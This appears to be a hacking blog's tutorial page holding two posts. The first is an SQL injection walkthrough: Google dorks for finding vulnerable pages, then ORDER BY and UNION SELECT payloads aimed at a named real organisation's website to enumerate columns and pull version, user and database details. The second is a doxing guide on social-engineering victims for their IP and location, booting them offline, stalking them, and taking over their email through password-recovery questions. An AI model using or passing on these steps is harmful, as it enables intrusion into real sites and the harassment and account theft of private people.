Showing posts with label tutorials. Show all posts
Showing posts with label tutorials. Show all posts

SQL(Structered Query Language) Injection | Tutorial |

Note: Remember you cant do Good in SQLI without proper knowledge in SQL CoolTongue

Tools Needed:
Hack Bar = Just download this on mozilla firefox add ons,
Dorks = Used in Dorking For targets
Fingers = for typing
VPN, Proxies, Anonymizers
BRAIN

So this Guide Covers
1st. Finding vulnerable sites
2nd. Finding number of columns
3rd. Getting INFOS ex. version,user,database
4th. Getting Databases,
5th. Getting Tables,
6th Getting Columns and Extracting Data

Some of the google Dorks Big Grin

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=



1st. Finding vulnerable sites



Type this in Google.
ex. inurl:news.php?id=
SS:http://i31.photobucket.com/albums/c374/Sp4nkstaPH/SQLI/1_zpsdf587c3c.png

Okay now.
We got this Target
Code:http://www.irishsanghatrust.ie/news.php?id=33

2nd. Finding number of columns

Ot get the number of Columns, we must use the query "order by " Basics. ok,lets try
http://www.irishsanghatrust.ie/news.php?id=33 order by 1-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 2-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 3-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 4-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 15-- => no error
http://www.irishsanghatrust.ie/news.php?id=33 order by 19-- => error
http://www.irishsanghatrust.ie/news.php?id=33 order by 18-- => no error

So this means. that the target has a total Of 18 Columns.

To Get the Columns and make it Show up in the webpage. We will use "UNION SELECT" Query.
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+UNION SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Note: If No vulnerable Columns Show up. Null the parameter. or just by adding " - " before the parameter.

3rd. Getting INFOS ex. version,user,database

There are different variables in finding and extracting data. but this only coves basics. we will only use.
@@version
@@user
@@database

if there three above does'nt work try these

version()
user()
database()

DOXING | TUTORIAL |

Okay Let's Start! if you don't know what is DOXING please google it yourself  :)

Method 1:This first method requires social engineering. Social engineering (from wiki reference) means to [in the context of security], understand the meaning of the art of manipulating people into performing actions or divulging confidential information.

Basically, you will generate a small conversation, and persuading the person of reveal information you want to obtain. If you start a skype conversation you have obtained the following information:- Skype Username (to resolve the IP)- Internet Protocol- City- State/Province- Country

After moving a bit deeper into the conversation you realize you can create a connection with this person. If you keep digging under his nose (not literally) you will find that you can find his Facebook, and then lead to his school. From his Facebook you have achieved:- Potential connection to Address- Potential Phone informationIF YOU HAVE HIM ADDED:- His e-mail linked to his Facebook. (preferably hotmail)

If you think about it, you have achieved a massive amount of information under a very low amount of time. From this moment on you can use this information to:- Manipulate (using this information)- Boot him offline (via IP and booter)- Stalk him- Call him- Hack his e-mail

Method 2:If you have the victim added on Facebook, link your Facebook account with your yahoo account and import the contacts under the contacts tab. After you've done that you have now viewed his e-mail. After you've obtained that and put it into your clipboard navigate to hotmail.com and press "Can't access your account?". Then, enter the e-mail and the captcha and look for something that says "Security Question." If not, you will have to do the longer process of about 2 hours to 24 hours. This requires Method 1 so you can obtain his birth-date and all.

Method 3:This method consists of using sites to gather information about him. The sites may be pipl.com, facebook.com, twitter.com, myspace.com, and google.com. This method is very effective if you have very little information about him. You might want to get his IP to narrow down the searches (by inputting his city, province/state and country).

I do not by any means believe DOXing is illegal if it is not used for illegal purposes. It just depends on the person. I am not responsible, however, for what you do with this information and the information you've gathered. Use it wisely.